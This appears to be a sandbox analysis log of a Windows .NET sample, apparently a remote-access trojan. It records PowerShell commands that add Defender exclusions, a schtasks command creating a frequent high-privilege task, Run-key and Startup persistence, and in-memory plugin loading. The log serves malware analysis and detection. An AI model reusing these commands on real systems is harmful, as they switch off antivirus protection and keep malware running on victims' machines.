Source: C:\Users\user\Desktop\PjGz899RZV.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe C:\Users\user\AppData\Roaming\PjGz899RZV.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe C:\Users\user\AppData\Roaming\PjGz899RZV.exe
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"Jump to behavior
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
Source: PjGz899RZV.lnk.0.dr | LNK file: ..\..\..\..\..\PjGz899RZV.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: PjGz899RZV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PjGz899RZV.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: PjGz899RZV.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: PjGz899RZV.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: PjGz899RZV.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: PjGz899RZV.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: PjGz899RZV.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: PjGz899RZV.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: PjGz899RZV.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: PjGz899RZV.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: PjGz899RZV.exe, Messages.cs | .Net Code: Memory
Source: PjGz899RZV.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: PjGz899RZV.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: PjGz899RZV.exe.0.dr, Messages.cs | .Net Code: Memory
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD345600BD pushad ; iretd 0_2_00007FFD345600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3443D2A5 pushad ; iretd 2_2_00007FFD3443D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD3445D2A5 pushad ; iretd 5_2_00007FFD3445D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD345700BD pushad ; iretd 5_2_00007FFD345700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD3445D2A5 pushad ; iretd 8_2_00007FFD3445D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD345700BD pushad ; iretd 8_2_00007FFD345700C1
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 15_2_00007FFD345400BD pushad ; iretd 15_2_00007FFD345400C1
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 16_2_00007FFD345400BD pushad ; iretd 16_2_00007FFD345400C1
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 17_2_00007FFD345700BD pushad ; iretd 17_2_00007FFD345700C1
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 18_2_00007FFD345600BD pushad ; iretd 18_2_00007FFD345600C1
Source: C:\Users\user\Desktop\PjGz899RZV.exe | File created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe

Boot Survival

Source: C:\Users\user\Desktop\PjGz899RZV.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
Source: C:\Users\user\Desktop\PjGz899RZV.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PjGz899RZV.lnk
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PjGz899RZV

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
